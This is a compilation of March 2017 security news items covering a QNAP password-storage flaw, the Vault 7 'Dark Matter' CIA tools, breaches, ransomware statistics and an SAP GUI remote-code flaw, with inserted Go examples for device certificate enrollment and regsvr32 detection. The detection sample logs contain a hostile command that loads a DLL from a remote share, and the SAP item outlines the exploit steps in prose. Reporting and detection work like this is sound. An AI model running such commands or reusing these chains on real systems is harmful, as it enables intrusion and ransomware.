Pasquale ‘sid’ Fiorillo from ISGroup (www.isgroup.biz), an Italian security company, and Guido ‘go’ Oricchio of PCego (www.pcego.com), a system integrator, have just released a critical security advisory for any QNAP NAS firmware version prior to 4.2.4 Build 20170313 (https://www.qnap.com/en/support/con_show.php?cid=113).


QNAP Systems, founded in 2004, provides network attached storage (NAS) and network video recorder (NVR) solutions for home and business use to the global market. QNAP also delivers a cloud service, called myQNAPcloud, that allows users to access and manage devices from anywhere. QTS is QNAP’s proprietary Linux-based device firmware.

The issue affects all QNAP NAS devices (all models and all versions) that are members of a Microsoft Active Directory domain, and allows a local QTS admin user, or another low-privileged user (such as “httpdusr”, used to run the web application), to access a configuration file that contains a badly encrypted Microsoft Domain Administrator password.

The affected component is the “uLinux.conf” configuration file, which is created with world-readable permissions and is used to store a Domain Administrator password.

This password is stored in the file obfuscated with a simple XOR cipher and base64 encoded.

“The vulnerability allows a local QTS admin user, or other low privileged user, to access configuration file that includes a bad crypted Microsoft Domain Administrator password if the NAS was joined to a Microsoft Active Directory domain.” reads the advisory. “The affected component is the “uLinux.conf” configuration file, created with a world-readable permission used to store a Domain Administrator password. Admin user can access the file using ssh that is enabled by default. Other users are not allowed to login, so they have to exploit a component, such as a web application, to run arbitrary command or arbitrary file read. Anyone is able to read uLinux.conf file, world readable by default, can escalate to Domain Administrator if a NAS is a domain member.”

Users are strongly advised to update their systems to the latest version released by the vendor (https://www.qnap.com/en/support/con_show.php?cid=113).

The Official advisory is available at: http://www.ush.it/team/ush/hack-qnap/qnap.txt


Vault7 Dark Matter batch – CIA has been targeting the iPhone supply chain since at least 2008
24.3.2017 securityaffairs BigBrothers

Wikileaks has released the second batch of the CIA’s Vault 7 dump; it contains further valuable documents for understanding how the CIA was hacking systems worldwide.
The Wikileaks Vault 7 dump will make headlines for a long time: the organization has just released another set of classified documents related to the hacking tools, techniques and exploit code used by CIA cyber spies to hack Apple MacBook and iOS devices.

Wikileaks dubbed this batch of information ‘Dark Matter’; it includes five documents on Mac and iPhone hacks developed by the CIA.


This is the second batch of Vault 7 released by WikiLeaks, after the whistleblower organization released the first one on March 7.

The hacking tools and techniques were devised by a CIA unit called the Embedded Development Branch (EDB).

“Today, March 23rd 2017, WikiLeaks releases Vault 7 ‘Dark Matter’, which contains documentation for several CIA projects that infect Apple Mac Computer firmware (meaning the infection persists even if the operating system is re-installed) developed by the CIA’s Embedded Development Branch (EDB). These documents explain the techniques used by CIA to gain ‘persistence’ on Apple Mac devices, including Macs and iPhones and demonstrate their use of EFI/UEFI and firmware malware.” reads the Dark Matter description provided by Wikileaks.

The CIA experts found a way to infect Apple firmware to gain persistence; in this way the attackers were able to maintain the infection on Mac OS and iOS devices even if the operating system was reinstalled.

According to WikiLeaks, one of the most interesting documents relates to the “Sonic Screwdriver” project, a “mechanism for executing code on peripheral devices while a Mac laptop or desktop is booting”, allowing an attacker to boot attack software, for example from a USB stick, “even when a firmware password is enabled”.

The technique allows a local attacker to boot a hacking tool from a peripheral device (i.e. USB stick, screwdriver), “even when a firmware password is enabled” on the device. This implies that Sonic Screwdriver allows attackers to modify the read-only memory of a device; the documents revealed that the malware is stored in the Apple Thunderbolt-to-Ethernet adapter.

Digging in the Dark Matter dump we can find the NightSkies 1.2 hacking tool, which is described as a “beacon/loader/implant tool” for the Apple iPhone.

“Also included in this release is the manual for the CIA’s “NightSkies 1.2” a “beacon/loader/implant tool” for the Apple iPhone. Noteworthy is that NightSkies had reached 1.2 by 2008, and is expressly designed to be physically installed onto factory fresh iPhones. i.e the CIA has been infecting the iPhone supply chain of its targets since at least 2008.” continues Wikileaks.

This hacking tool has expressly been designed by the CIA hackers to infect “factory fresh” iPhones, likely during transport. The existence of the tool suggests that the Central Intelligence Agency has been targeting the iPhone supply chain since at least 2008.

“While CIA assets are sometimes used to physically infect systems in the custody of a target it is likely that many CIA physical access attacks have infected the targeted organization’s supply chain including by interdicting mail orders and other shipments (opening, infecting, and resending) leaving the United States or otherwise,” says WikiLeaks.

“DarkSeaSkies” is another implant described in the Dark Matter repository. It is described as “an implant that persists in the EFI firmware of an Apple MacBook Air computer” and consists of “DarkMatter”, “SeaPea” and “NightSkies”, respectively EFI, kernel-space and user-space implants.

Wikileaks plans to release more interesting information about the CIA cyber capabilities and hacking techniques.


Data breach – Are you an Android Forums user? Reset your password now.
24.3.2017 securityaffairs Android

Android Forums has notified users of a data breach; according to the moderators at the site, roughly 2.5 percent of users have been affected.
Android Forums is the latest victim of a data breach; roughly 2.5 percent of its users have been affected.

The moderators at Android Forums confirmed that they have been able to identify the compromised accounts and, in response to the incident, have reset the passwords for those accounts.

The moderators added that many of the affected accounts were older and half of them had never posted to Android Forums.

“Unfortunately, we were recently informed by our server engineers that the server hosting Android Forums was compromised and the website’s database was accessed.” reads the data breach notification published by Android Forums. “While this breach was relatively small, affecting less than 2.5% of our active users and limited data accessed, we want to provide as much helpful information as possible so you can take some steps to protect yourself.”

The hackers who breached the forum’s database accessed email addresses, hashed passwords, and salts. The moderators warn users of possible spear phishing attacks leveraging the stolen data.

“This could simply be an e-mail harvesting attempt. A spammer could run the acquired email addresses through a validation tool, then bulk e-mail all valid emails in a spam or phishing campaign. Luckily, Gmail and similar e-mail services offer strong spam prevention that automatically filters potential spam and phishing attempts or provides warning.” reads the notification. “At any rate, with emails phishing attempts could be made. They could pretend to be us, with emails sent out. Be cautious with what is asked of you in an email. We will never ask for your password in email.”


Of course, every user of Android Forums is strongly advised to change their password as a precaution.

The administrators of the forum have identified and resolved the flaw exploited by the attackers, they have also implemented further measures to harden the site.

Below is the information shared by the administrators in the advisory:

The exploit used has been identified and resolved. The server is being further hardened and extra “just in case” actions are being taken.
No other sites in our network appear to have been accessed.
We were able to replay the attack and log the output – identifying all accounts compromised. We have targeted an email, and this notice, to those accounts.
Only 1 staff member was affected. Only about 40 people who have registered in 2016 and 2017. The rest are older accounts.
Over 50% of accounts compromised never posted on the site, leading us to believe many of those were bots.
Information taken: Email address, hashed password, and salt. Usernames were NOT taken.
The Neverstill Team that runs the forum apologized for the incident.

The improvements announced by site administrators include site-wide HTTPS support and a new 2-step authentication requirement for internal staff.


WikiLeaks Releases Data on CIA's Apple Hacking Tools

24.3.2017 securityweek BigBrothers

WikiLeaks has released a new round of Vault 7 files. The latest dump, dubbed “Dark Matter,” details some of the tools allegedly used by the CIA to target Apple devices.

The tools are named Sonic Screwdriver, Der Starke, Triton, DarkSeaSkies, NightSkies and SeaPea and, based on the descriptions provided in the files made available by WikiLeaks, they can be used to spy on iPhones and Mac computers. However, in most cases, deploying them requires physical access to the targeted device.

Sonic Screwdriver, for instance, is a tool that can be used to execute code from a USB thumb drive or other external disk connected to a Mac laptop even if the firmware is protected by a password. The documents obtained by WikiLeaks show that Sonic Screwdriver is stored on the firmware of a Thunderbolt-to-Ethernet adapter.

The DarkSeaSkies implant is designed for targeting the EFI on MacBook Air computers, and it’s meant to be delivered via “a supply chain intercept or a gift to the target.” DarkSeaSkies relies on the DarkMatter EFI driver for persistence and installing other tools, and the SeaPea OS X rootkit for stealth and execution of other implants. One such implant is NightSkies, which provides command and control capabilities.

The documents show DarkSeaSkies can be installed by booting the targeted system with an external flash drive. The implant is persistent across OS upgrades and reinstalls, but it can be removed by the attacker using a special command. Under certain conditions, the implant may also remove itself automatically.

Another set of tools includes a piece of OS X malware dubbed Triton, its infector Dark Mallet, and Der Starke, the EFI-persistent version of Triton.

One version of the NightSkies tool is designed for targeting iPhones. Once installed on a device, it can be used to execute arbitrary commands, download additional tools to the phone, and steal various types of files, including the address book, SMS messages and call logs. NightSkies, which also requires physical access to the targeted device, is recommended for “factory fresh” devices.

The documents are dated 2008, 2009 and 2012, but WikiLeaks claims other Vault7 files show the CIA has continued to improve these tools. The organization also pointed out that the files show the intelligence agency has been “infecting the iPhone supply chain of its targets since at least 2008.”

“While CIA assets are sometimes used to physically infect systems in the custody of a target it is likely that many CIA physical access attacks have infected the targeted organization's supply chain including by interdicting mail orders and other shipments (opening, infecting, and resending) leaving the United States or otherwise,” WikiLeaks said.

Impact of the tools and risks

The first Vault7 dump summarized the CIA’s alleged hacking capabilities, and appeared to show that the agency is capable of spying on or through a wide range of devices. While actual exploits have not been published, the information that was made public did not describe any sophisticated tools and many of the vulnerabilities had already been addressed.

In the case of the Dark Matter dump, the fact that the Apple implants require physical access to devices makes them less dangerous. Nicholas Weaver, a researcher at the International Computer Science Institute of the University of California, Berkeley, pointed out, “if somebody has physical access to your computer, you can’t call it yours anymore.”

As for WikiLeaks’ supply chain claims, Weaver and others believe the organization’s statement may be misleading.

“Installing onto ‘factory fresh’ is not about interdiction but targeted delivery: the CIA asset gives the target a phone or a MacBook, this is the general extent of the ‘supply chain’ the CIA is concerned with,” Weaver told SecurityWeek via email.

“Interdiction in the ‘supply chain’ works very well for things like routers, which are big, expensive, few in number, shipped from the US, and to known customers,” he explained. “For example, a Cisco router sent to Syria. Basically you have to know that ‘his package is being shipped from location I can control to known target’ in order to intercept and sabotage.”

Weaver continued, “It doesn’t work for something you can buy at a local store or which is drop-shipped from a local warehouse in the country where it’s going to be used from any of a gazillion different vendors. The CIA doesn’t have a fleet of agents in foreign post offices that can grab such a package. And you don’t mass-poison (say at the factory) this way, for THAT you would have to sabotage the machine that programs up all the iPhones in the first place.”

On the other hand, Weaver pointed out that the WikiLeaks files reveal some interesting information about the CIA’s human intelligence (HUMINT) capabilities.

“At least one tool was specifically because the asset could give the target a MacBook Air, indicating that the target was very trusted by the asset,” the expert said. “Likewise, the two tools together which allow one to reflash firmware even when the EFI password was set says that the CIA had a case where a paranoid target had his computer with a very low level password in the firmware, and the asset would have access to the computer for a short period of time and needed to reflash the computer.”


Security Improvements Make Android More Attractive to Business

24.3.2017 securityweek Android
Google Outlines State of Android Security With 2016 Year In Review Report

Accepting Android as a staff BYOD (Bring Your Own Device) option has always been tempered by security officers' understanding that it is less secure than iOS. In the last year, Google has made serious efforts to reduce that perception. The Android Security 2016 Year in Review report (PDF), published this week by Google, describes two areas the company has particularly improved Android security: updates, and the elimination of malicious apps.

Security updates, or patches, have always been a problem in the Android ecosphere. The difficulty is the sheer number of different Android manufacturers involved; some of whom rarely distribute the monthly updates provided by Google. Over the last year, Google has worked on improving this. It has concentrated on two areas: improving the discovery and responsible disclosure of vulnerabilities in its partners' products; and improving the speed and regularity of device patching.

It has achieved what can be described as partial success. "As of December 2016," says the report, "735 million Android devices report a 2016 security patch level." The downside is that this still leaves a similar number that did not. Nevertheless, "Over the course of the year, Android device manufacturers became more efficient at delivering monthly security updates, including expanding their security programs to accept and address security vulnerabilities specific to their devices."

New models of Google's own products, Pixel and Nexus, and several of the major manufacturers such as Samsung and LG, have introduced automatic updating. At the end of 2016, Android 7.1.1 introduced new features to improve updating in general through seamless automatic updates. "To do this," says Google, "devices have two system images: one for the currently active system and one to receive an updated image. When an update is available, the device downloads the new system image in the background. The device seamlessly switches to the new software update the next time it reboots... As more new phones are sold with Android 7.1.1, this feature will become available on a wider variety of devices."

Google also improved its ability to detect and remove potentially harmful apps (PHAs), such as trojans, spyware and phishing apps, both on the device and from within the Google Play Store. "The goal," says Google, "is to provide the right protection at the moment it is needed by the user." During 2016, Google's security services performed over 790 million device security scans daily, covering phones, tablets, watches and TVs. This is up from around 450 million in the previous year.

Similar attention is given to the apps in Google Play, and PHA installations from Play have fallen dramatically: trojan installs fell by 51.5%, hostile downloaders by 54.6%, backdoors by 30.5%, and phishing apps by 73.4%. "By the end of 2016," claims Google, "only 0.05 percent of devices that downloaded apps exclusively from Play contained a PHA; down from 0.15 percent in 2015."

Google accepts that there is still work to do, especially to protect those devices that install apps from outside of Play -- and it expects to do this in the present year. "We believe that advances in machine learning and automation can help reduce PHA rates significantly in 2017, both inside and outside of Google Play."

As it stands, according to Google's figures, users of mainstream Google devices that limit app installations to Google Play are increasingly secure; and already significantly more secure than last year. This has to be good news for all organizations with -- or considering -- an Android-based BYOD policy for staff.


Mocana Launches Industrial IoT Security Platform

24.3.2017 securityweek IoT
As the industrial internet of things (IIoT) begins to revolutionize productivity, so too does it dramatically increase industry's cyber-attack surface. What has been missing is a single platform to provide or enable security across the entirety of IIoT.

To fill this gap, Mocana -- a San Francisco-based firm that specializes in security for embedded devices -- has today released its new IoT Security Platform: a full-stack security solution designed to protect industrial IoT devices and device-to-cloud communications. The platform builds on the cybersecurity technology Mocana already has for embedded devices. In particular, it provides software capabilities, a set of simple APIs and a path to utilize Mocana's planned management and analytics capabilities.

The new platform updates 11 existing Mocana software modules, but also and importantly introduces two new innovations: NanoTAP and NanoAIDE. The former provides a vendor-agnostic software abstraction layer that allows manufacturers to take full advantage of the latest security chip technologies such as the Infineon OPTIGA Trusted Platform Module (TPM), ARM TrustZone, Intel SGX, and Intel EPID.

These new chips provide a hardware-based root of trust for embedded systems, significantly increasing the security and trustworthiness of the devices. NanoTAP is a new software module that allows applications to make use of the security capabilities of the hardware.

NanoAIDE solves one of the major problems in IIoT: secure identity for secure communications. It is not the technology that is a problem, but getting it to scale to the billions of devices that comprise the IoT. The technology is to use X.509 digital certificates to verify the individual device identity and allow secure communication between the device and its controller -- whether that is local or in the cloud. The standard simple certificate enrollment protocol (SCEP) commonly used to enroll digital certificates requires a manual process that cannot scale to the volume required for IIoT.

Mocana's NanoAIDE solution includes Enrollment over Secure Transport (EST), a newer standard that automates the management and enrollment of digital certificates. "Mocana now supports both SCEP and EST to provide the flexibility and scale for managing Public Key Infrastructure using standard X.509 certificates," announced the company in a blog post today.
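The device-identity flow the two paragraphs above describe, as an added example in Go (not Mocana's code): the device generates its own key and a CSR, an automated CA endpoint standing in for the EST enrollment step checks proof of possession and a manufacturing allow-list before issuing an X.509 certificate, and the controller verifies the chain to recover the device identity. The CA name, the device serial "PUMP-0042" and the allow-list are constructed for the example.

```go
package main

import (
	"crypto/ecdsa"
	"crypto/elliptic"
	"crypto/rand"
	"crypto/x509"
	"crypto/x509/pkix"
	"errors"
	"fmt"
	"math/big"
	"time"
)

// newDeviceCA creates a self-signed issuing CA for device certificates
// (constructed for the example; a real deployment keeps this key in an HSM).
func newDeviceCA() (*x509.Certificate, *ecdsa.PrivateKey, error) {
	key, err := ecdsa.GenerateKey(elliptic.P256(), rand.Reader)
	if err != nil {
		return nil, nil, err
	}
	tmpl := &x509.Certificate{
		SerialNumber:          big.NewInt(1),
		Subject:               pkix.Name{CommonName: "Example IIoT Device CA"},
		NotBefore:             time.Now().Add(-time.Hour),
		NotAfter:              time.Now().Add(10 * 365 * 24 * time.Hour),
		IsCA:                  true,
		BasicConstraintsValid: true,
		KeyUsage:              x509.KeyUsageCertSign | x509.KeyUsageDigitalSignature,
	}
	der, err := x509.CreateCertificate(rand.Reader, tmpl, tmpl, &key.PublicKey, key)
	if err != nil {
		return nil, nil, err
	}
	cert, err := x509.ParseCertificate(der)
	return cert, key, err
}

// deviceCSR runs on the device: the key is generated locally and never leaves it
// (a TPM would hold it); only the signed request travels to the CA.
func deviceCSR(deviceID string) (*ecdsa.PrivateKey, []byte, error) {
	key, err := ecdsa.GenerateKey(elliptic.P256(), rand.Reader)
	if err != nil {
		return nil, nil, err
	}
	tmpl := &x509.CertificateRequest{Subject: pkix.Name{CommonName: deviceID}}
	der, err := x509.CreateCertificateRequest(rand.Reader, tmpl, key)
	return key, der, err
}

// enrollDevice is the CA side of automated enrollment (the role EST's /simpleenroll plays):
// check proof of possession and the allow-list, then issue a client certificate whose subject the CA decides.
func enrollDevice(caCert *x509.Certificate, caKey *ecdsa.PrivateKey, csrDER []byte, allowed map[string]bool) ([]byte, error) {
	csr, err := x509.ParseCertificateRequest(csrDER)
	if err != nil {
		return nil, err
	}
	if err := csr.CheckSignature(); err != nil { // proof of possession of the private key
		return nil, err
	}
	if !allowed[csr.Subject.CommonName] {
		return nil, errors.New("enrollment refused: device ID not on allow-list")
	}
	tmpl := &x509.Certificate{
		SerialNumber: big.NewInt(time.Now().UnixNano()), // clock-derived for brevity; a real CA issues random serials
		Subject:      pkix.Name{CommonName: csr.Subject.CommonName, OrganizationalUnit: []string{"iiot-devices"}},
		NotBefore:    time.Now().Add(-time.Hour),
		NotAfter:     time.Now().Add(365 * 24 * time.Hour),
		KeyUsage:     x509.KeyUsageDigitalSignature,
		ExtKeyUsage:  []x509.ExtKeyUsage{x509.ExtKeyUsageClientAuth},
	}
	return x509.CreateCertificate(rand.Reader, tmpl, caCert, csr.PublicKey, caKey)
}

// verifyDevice is the controller side: accept only certificates that chain to
// the device CA with client-auth usage, and return the proven device identity.
func verifyDevice(caCert *x509.Certificate, certDER []byte) (string, error) {
	cert, err := x509.ParseCertificate(certDER)
	if err != nil {
		return "", err
	}
	roots := x509.NewCertPool()
	roots.AddCert(caCert)
	opts := x509.VerifyOptions{Roots: roots, KeyUsages: []x509.ExtKeyUsage{x509.ExtKeyUsageClientAuth}}
	if _, err := cert.Verify(opts); err != nil {
		return "", err
	}
	return cert.Subject.CommonName, nil
}

func main() {
	caCert, caKey, _ := newDeviceCA()
	_, csr, _ := deviceCSR("PUMP-0042") // constructed device serial
	certDER, err := enrollDevice(caCert, caKey, csr, map[string]bool{"PUMP-0042": true})
	if err != nil {
		panic(err)
	}
	fmt.Println(verifyDevice(caCert, certDER))
}
```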

"When it comes to mission-critical IoT security, there is no middle-ground or acceptable margin for error," said William Diotte, CEO of Mocana. "Hackers have demonstrated their ability to get behind firewalls and take over IoT devices. Once a hacker has control of an IoT device or controller behind a firewall, they can wreak havoc by manipulating flow controls, valves, compressors, power systems and engine controls that result in loss of critical services and loss of life. The Mocana IoT Security Platform is the most comprehensive IoT security solution for industrial manufacturers that are concerned about cyberattacks on embedded systems, IoT devices and industrial cloud systems."


Ransomware cost companies worldwide more than a billion dollars last year

23.3.2017 Novinka/Bezpečnost Viruses
The creators of ransomware extortion viruses collected more than a billion dollars from attacked companies worldwide last year. The figure, which the US FBI had already predicted last year, has now been confirmed by KnowBe4 in its security report.
The company points out that a third of the surveyed companies faced a ransomware attack in the past twelve months. Of those that were protected against such attacks by some antivirus solution, more than half (53 percent) still failed to prevent a ransomware infection.

KnowBe4 therefore built a special ransomware simulator, which it tried out on the survey respondents. Almost three quarters of the surveyed companies took the test, and 48 percent of them were unable to detect the simulator's behaviour and are therefore potentially vulnerable.

"Ransomware spreads primarily through e-mail phishing campaigns, so users should be trained to identify it and thereby prevent it from getting onto their devices," says KnowBe4 CEO Stu Sjouwerman.

"It is a simple rule that users can learn. If they do not click on links and do not open suspicious attachments, they will not infect their work computer with ransomware! The human factor is an important security layer in every company. Employees should be trained to detect fraudulent e-mail. Once companies realize this, their security improves dramatically."

Six encrypted PCs and two servers
At companies that faced a ransomware attack last year, the criminals encrypted on average six computers and two servers. This refutes the prevailing notion that ransomware attacks only the computer of the user who carelessly downloads it onto their device.

Each attack on average caused a twelve-hour work stoppage for the employees whose computers were attacked, and a further twelve hours of work for the IT department to remedy the problem. The positive news is that the vast majority of attacked companies (94 percent) did not pay the attackers the demanded ransom. Those that did paid amounts of three to five bitcoins, equivalent to 30 to 150 thousand crowns.

"Paying the attackers is short-sighted, because it motivates them to further attacks," warns Miroslav Dvořák, technical director of ESET. "What matters is prevention and a quality security solution, which, however, cannot always be relied on one hundred percent. The attackers are always one step ahead." ESET is nevertheless succeeding in protecting against ransomware: at the beginning of March, Germany's largest IT magazine, Computer Bild, named it the only company that was able to reliably detect attacks from these extortion campaigns. It was also successful in attempts to remove ransomware from infected devices.

The survey's authors also admit that antivirus solutions can protect companies from this danger to a certain extent. "Together with continuous security training and testing of employees, companies can significantly strengthen their security this way," they point out.


Google and Yahoo have a problem: a hacker is selling over a million of their accounts

23.3.2017 Novinka/Bezpečnost Hacking
The offer appeared on a black online marketplace and contains login credentials for 1.2 million user accounts that were compromised between 2008 and 2016.
Login credentials for more than a million accounts of the Gmail and Yahoo internet services are being sold by a hacker using the alias SunTzu583. Among the user profiles on offer are 100 thousand Yahoo accounts compromised in 2012 in the hacking attack on the Last.fm website, the server Infosecurity-magazine.com pointed out. The offered data consists of usernames, e-mail addresses and passwords.

Another 145 thousand Yahoo accounts included in SunTzu583's offer were apparently obtained by the seller in the attacks on Adobe in 2013 and on MySpace, which took place back in 2008 but about which information was published only last year. The numbers of Yahoo accounts on offer are, however, laughably low compared to the numbers of Gmail accounts being sold.

In total there are almost a million accounts, half a million of which come from three cyber attacks: the breach of the Bitcoin Security Forum internet forum, the attack on Tumblr in 2013 and the hacking attack on MySpace in 2014, during which the attackers also obtained the Yahoo accounts mentioned above.

Change your password, an expert advises
The remaining 450 thousand Gmail accounts on offer were obtained by attackers during a whole series of actions against the websites and services Last.fm, Adobe, Dropbox, Tumblr and others. The hacker is offering the complete set of 1.2 million accounts in exchange for bitcoins, the internet currency that cyber attackers usually demand in ransomware extortion campaigns. One bitcoin sells for the equivalent of 30 thousand crowns. Neither Yahoo nor Google has yet commented on the fact that hundreds of thousands of their accounts are being offered in an illegal auction.

"In any case, this is further bad news for Yahoo. In recent years the company has admitted a number of security incidents in which the personal data of its customers in more than a billion accounts was compromised," states the Infosecurity-magazine.com website. "Users who are not sure whether they have been targeted, and who fear that their Gmail or Yahoo account is among the traded items, should immediately change the passwords for these accounts," advises Miroslav Dvořák, technical director of ESET.

According to Dvořák, users should use two-factor authentication to access their accounts, which, in addition to the classic password, also uses a one-time generated confirmation code that the user receives by text message on a mobile phone or by e-mail.


Millions of attacks and damage in the billions. Cybercrime in Germany is growing

23.3.2017 Novinka/Bezpečnost Crime
Internet and cyber crime in Germany is growing, but its exact extent is hard to estimate. The head of the Federal Criminal Police Office (BKA), Holger Münch, said so at the CeBIT computer trade fair in Hanover. He also stated that the Federal Republic and German companies are the focus of considerable activity by foreign intelligence services.
The latest statistics, for 2015, speak of 45,793 purely cyber crimes that caused damage of 40.5 million euros (one billion crowns). Of crimes that were not exclusively cyber crimes but in which the internet was also used, the police registered almost 245,000 the year before last. The real number of such acts is, however, much higher.

"An analysis by the state criminal police office here in Lower Saxony showed that people report only about nine percent of all such offences to the police," said Münch. The reason may be that the affected individuals or companies never find out that they have become victims of crime, or perhaps fear of damage to their reputation.

The police do not register all cyber attacks
Münch also pointed to studies according to which the police in fact register less than two percent of all internet crimes. According to a 2015 estimate by the German economic institute DIW, 14.7 million cyber crimes occur in Germany every year, causing damage of 3.4 billion euros (almost 92 billion crowns).

"Cybercrime is a business on the rise," stated Münch, according to whom a person today no longer needs to be an IT specialist to take part in this kind of crime.

Münch also noted that Germany and German companies are at the centre of attention of foreign intelligence services. According to him, these focus among other things on espionage concerning military, energy or engineering technologies. Münch did not name a specific country, but with regard to economic and political espionage, Russia and China are the countries most often mentioned in the West.


Exclusive: Wikileaks reveals CIA's Apple MacOS and iPhone Hacking Techniques
23.3.2017 thehackernews BigBrothers
As part of its "Vault 7" series, Wikileaks — the popular whistle-blowing platform — has just released another batch of classified documents focused on exploits and hacking techniques the Central Intelligence Agency (CIA) designed to target Apple MacOS and iOS devices.
Dubbed "Dark Matter," the leak uncovers macOS vulnerabilities and attack vectors developed by a special division of the CIA called the Embedded Development Branch (EDB), the same branch that created the "Weeping Angel" attack, and focused specifically on hacking Mac and iOS firmware.
CIA Developed Unremovable Mac OS and iPhone Malware
The newly released documents revealed that CIA had also been targeting the iPhone since 2008.
The Agency has created a malware that is specially designed to infect Apple firmware in a way that the infection remains active on MacOS and iOS devices even if the operating system has been re-installed.
According to Wikileaks, the released documents also give a clear insight into "the techniques used by the CIA to gain 'persistence' on Apple Mac devices, including Macs and iPhones and demonstrate their use of EFI/UEFI and firmware malware."
Project Sonic Screwdriver: Infect Devices via USB
One of the documents from 2012 reveals details about the "Sonic Screwdriver" project, which according to the CIA, is a "mechanism for executing code on peripheral devices while a Mac laptop or desktop is booting."
This technique may allow hackers to deliver malware from a peripheral device – such as a USB stick or a screwdriver – "even when a firmware password is enabled" on the device, which means the read-only memory of a device can be modified using Sonic Screwdriver.
The malware is stored in the Apple Thunderbolt-to-Ethernet adapter, claims WikiLeaks.
The NightSkies Implants: iPhone's Supply Chain Attack
Another document in the latest release consists of a manual for the CIA's "NightSkies 1.2," which is described as a "beacon/loader/implant tool" for the Apple iPhone.
What's noteworthy is that the first version of this iPhone hacking tool has been operational since 2007 and was expressly designed to infect "factory fresh" iPhones in the supply chain.
"While CIA assets are sometimes used to physically infect systems in the custody of a target it is likely that many CIA physical access attacks have infected the targeted organization's supply chain including by interdicting mail orders and other shipments (opening, infecting, and resending) leaving the United States or otherwise," says WikiLeaks.
CIA's Dark Matter leak is the second batch of Vault 7 released by WikiLeaks, after the whistleblower organization released the first part of an unprecedentedly large archive of CIA-related classified documents on March 7.
The previously published Vault 7 leak outlined a broad range of security bugs in software and devices, including iPhones, Android phones, and Samsung TVs, which millions of people around the world rely on, used to intercept communications and spy on targets.
Expect to see more revelations about the government and intelligence agencies from WikiLeaks in the coming days as part of its Year Zero series.


SAP Vulnerability Exposes Enterprises to Ransomware, Other Attacks

23.3.2017 securityweek Virus
A remote code execution (RCE) vulnerability in SAP GUI (Graphical User Interface) exposes unpatched systems to malware attacks such as ransomware, ERPScan security researchers warn.

The flaw was discovered in December 2016, and SAP was informed of the issue the same month, yet a fix was released only as part of SAP’s March 2017 security updates. The flaw was found in SAP GUI for Windows 7.20 to 7.50, and was assessed with a High severity rating (a CVSS Base Score of 8.0).

SAP GUI is a platform that offers remote access to the SAP central server in a company network. To exploit the vulnerability and bypass SAP GUI security policy to execute the code, an attacker would have to use special ABAP (Advanced Business Application Programming) code.

According to ERPScan, a company specialized in securing SAP and Oracle applications, the vulnerability could allow an attacker to “access arbitrary files and directories located in an SAP-server filesystem, including an application’s source code, configuration, and critical system files.” Actors could use the bug to obtain critical technical and business-related information stored in a vulnerable SAP-system.

“When we open SAP GUI > Options > Security > Security Configuration > Open security configuration, we can see the list of rules which SAP GUI uses. These rules determine whether or not to show security prompt during critical actions (e.g. when an ABAP code wants to read a local file, download a file from the server to client, or execute a program). Our research revealed that SAP GUI has a rule which allows reading, writing, executing of regsvr32.exe Windows application without the security prompt,” ERPScan explains.

The security researchers also explain that regsvr32.exe can be used to load DLL files from a remote SMB share and execute the DllMain function. To reproduce the flaw, one can compile a DLL file and upload it to an SMB share, create an ABAP program and replace the DllMain path with the share path, then execute the program.
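Detection logic for the chain ERPScan describes above, as an added example in Go (not ERPScan's or SAP's code): it scans process-creation events and flags regsvr32.exe launched with a UNC path, raising severity when the parent is the SAP GUI client (saplogon.exe is assumed here to be the SAP GUI process name). The log format, hosts and share paths are constructed for the example.

```go
package main

import (
	"fmt"
	"regexp"
	"strings"
)

// Constructed process-creation events (not real logs): key=value fields with
// the command line as a quoted last field. Hosts and paths are made up.
var sampleEvents = []string{
	`2017-03-23T10:15:02Z host=WS-17 parent=saplogon.exe image=regsvr32.exe cmdline="regsvr32.exe /s \\10.0.0.5\share\payload.dll"`,
	`2017-03-23T10:15:07Z host=WS-17 parent=explorer.exe image=notepad.exe cmdline="notepad.exe C:\notes.txt"`,
	`2017-03-23T10:16:41Z host=WS-22 parent=msiexec.exe image=regsvr32.exe cmdline="regsvr32.exe /s C:\Program Files\Vendor\ctl.dll"`,
	`2017-03-23T10:17:03Z host=WS-31 parent=cmd.exe image=regsvr32.exe cmdline="regsvr32.exe /s \\fileserver\public\x.dll"`,
}

type Event struct {
	Time, Host, Parent, Image, Cmdline string
}

type Finding struct {
	Event    Event
	Severity string // "high" or "medium"
	Reason   string
}

// fieldRE captures key=value pairs, allowing a double-quoted value with spaces.
var fieldRE = regexp.MustCompile(`(\w+)=("([^"]*)"|\S+)`)

// uncRE matches a UNC path such as \\server\share\file.dll inside a command line.
var uncRE = regexp.MustCompile(`\\\\[^\s\\]+\\\S+`)

func parseEvent(line string) Event {
	fields := strings.Fields(line)
	if len(fields) == 0 {
		return Event{}
	}
	ev := Event{Time: fields[0]}
	for _, m := range fieldRE.FindAllStringSubmatch(line, -1) {
		val := m[2]
		if strings.HasPrefix(val, `"`) {
			val = m[3] // inner value without the quotes
		}
		switch strings.ToLower(m[1]) {
		case "host":
			ev.Host = val
		case "parent":
			ev.Parent = val
		case "image":
			ev.Image = val
		case "cmdline":
			ev.Cmdline = val
		}
	}
	return ev
}

// detectRemoteRegsvr32 flags regsvr32.exe loading a DLL from a network share.
// A parent of saplogon.exe (assumed to be the SAP GUI client process) raises
// severity, because the SAP GUI rule described above lets ABAP code run
// regsvr32 without a security prompt. Local registrations are ignored.
func detectRemoteRegsvr32(lines []string) []Finding {
	var out []Finding
	for _, line := range lines {
		ev := parseEvent(line)
		if !strings.EqualFold(ev.Image, "regsvr32.exe") {
			continue
		}
		unc := uncRE.FindString(ev.Cmdline)
		if unc == "" {
			continue // local DLL registration: ordinary installer behaviour
		}
		f := Finding{Event: ev, Severity: "medium", Reason: "regsvr32 loading DLL from network share " + unc}
		if strings.EqualFold(ev.Parent, "saplogon.exe") {
			f.Severity = "high"
			f.Reason += ", spawned by SAP GUI"
		}
		out = append(out, f)
	}
	return out
}

func main() {
	for _, f := range detectRemoteRegsvr32(sampleEvents) {
		fmt.Printf("[%s] %s %s parent=%s: %s\n", f.Severity, f.Event.Time, f.Event.Host, f.Event.Parent, f.Reason)
	}
}
```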

“The attack vector is rather trivial. By exploiting this vulnerability, an attacker can force all the SAP GUI clients within a company to automatically download malware that locks workstations and demands money in exchange for regaining control of their systems. Of note, each client has its own unique payment address, which worsens the situation,” says Vahagn Vardanyan, one of the ERPScan researchers who discovered this bug.

Responding to a SecurityWeek inquiry, ERPScan’s Darya Maenkova explains that an attacker can create a malicious transaction and then simply compromise the SAP Server to put the transaction into autoloading. She also explains that attackers could use a remotely exploitable vulnerability to compromise the server.

